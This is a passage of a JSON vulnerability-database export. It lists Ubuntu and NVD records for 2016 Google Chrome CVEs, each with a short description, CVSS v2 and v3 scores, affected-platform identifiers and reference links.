"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5219", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5219"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5219", "href": "https://ubuntu.com/security/CVE-2016-5219", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:12", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux,\nand 55.0.2883.84 for Android incorrectly handled form actions, which\nallowed a remote attacker to bypass Content Security Policy via a crafted\nHTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5225", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5225"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5225", "href": "https://ubuntu.com/security/CVE-2016-5225", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:50:38", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto potentially exploit heap corruption via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5203", "href": "https://ubuntu.com/security/CVE-2016-5203", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:44:57", "description": "A heap use after free in PDFium in Google Chrome prior to 54.0.2840.59 for\nWindows, Mac, and Linux; 54.0.2840.85 for Android allows a remote attacker\nto potentially exploit heap corruption via crafted PDF files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-18T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5183", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5183"], "modified": "2016-12-18T00:00:00", "id": "UB:CVE-2016-5183", "href": "https://ubuntu.com/security/CVE-2016-5183", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:44:33", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto potentially exploit heap corruption via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5211", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5211"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5211", "href": "https://ubuntu.com/security/CVE-2016-5211", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:14", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux and Windows, and\n55.0.2883.84 for Android allowed possible corruption of the DOM tree during\nsynchronous event handling, which allowed a remote attacker to inject\narbitrary scripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5208", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5208"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5208", "href": "https://ubuntu.com/security/CVE-2016-5208", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T16:37:28", "description": "A missing check for whether a property of a JS object is private in V8 in Google Chrome prior to 55.0.2883.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-01-09T19:29:00", "type": "cve", "title": "CVE-2016-9651", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9651"], "modified": "2019-01-16T13:43:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2016-9651", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9651", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:33", "description": "Incorrect handling of invalid URLs in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5222", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5222"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5222", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:37:43", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled iframes, which allowed a remote attacker to bypass a no-referrer policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-9650", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9650"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-9650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9650", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:39", "description": "A timing attack on denormalized floating point arithmetic in SVG filters in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to bypass the Same Origin Policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5224", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5224"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5224", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:29", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled navigation within PDFs, which allowed a remote attacker to temporarily spoof the contents of the Omnibox (URL bar) via a crafted HTML page containing PDF data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5218", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5218"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5218", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:12", "description": "Heap buffer overflow during TIFF image parsing in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5210", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5210"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5210", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:21", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to perform an out of bounds memory read via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5216", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5216"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5216", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:21", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly permitted access to privileged plugins, which allowed a remote attacker to bypass site isolation via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5217", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5217"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5217", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:18", "description": "A use after free in webaudio in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5215", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5215"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:38", "description": "Integer overflow in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption or DoS via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5223", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5223"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:48", "description": "An off by one error resulting in an allocation of zero size in FFmpeg in Google Chrome prior to 54.0.2840.98 for Mac, and 54.0.2840.99 for Windows, and 54.0.2840.100 for Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted video file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5199", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.87"], "id": "CVE-2016-5199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.87:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:25", "description": "Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux; 54.0.2840.85 for Android permitted navigation to blob URLs with non-canonical origins, which allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via crafted HTML pages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 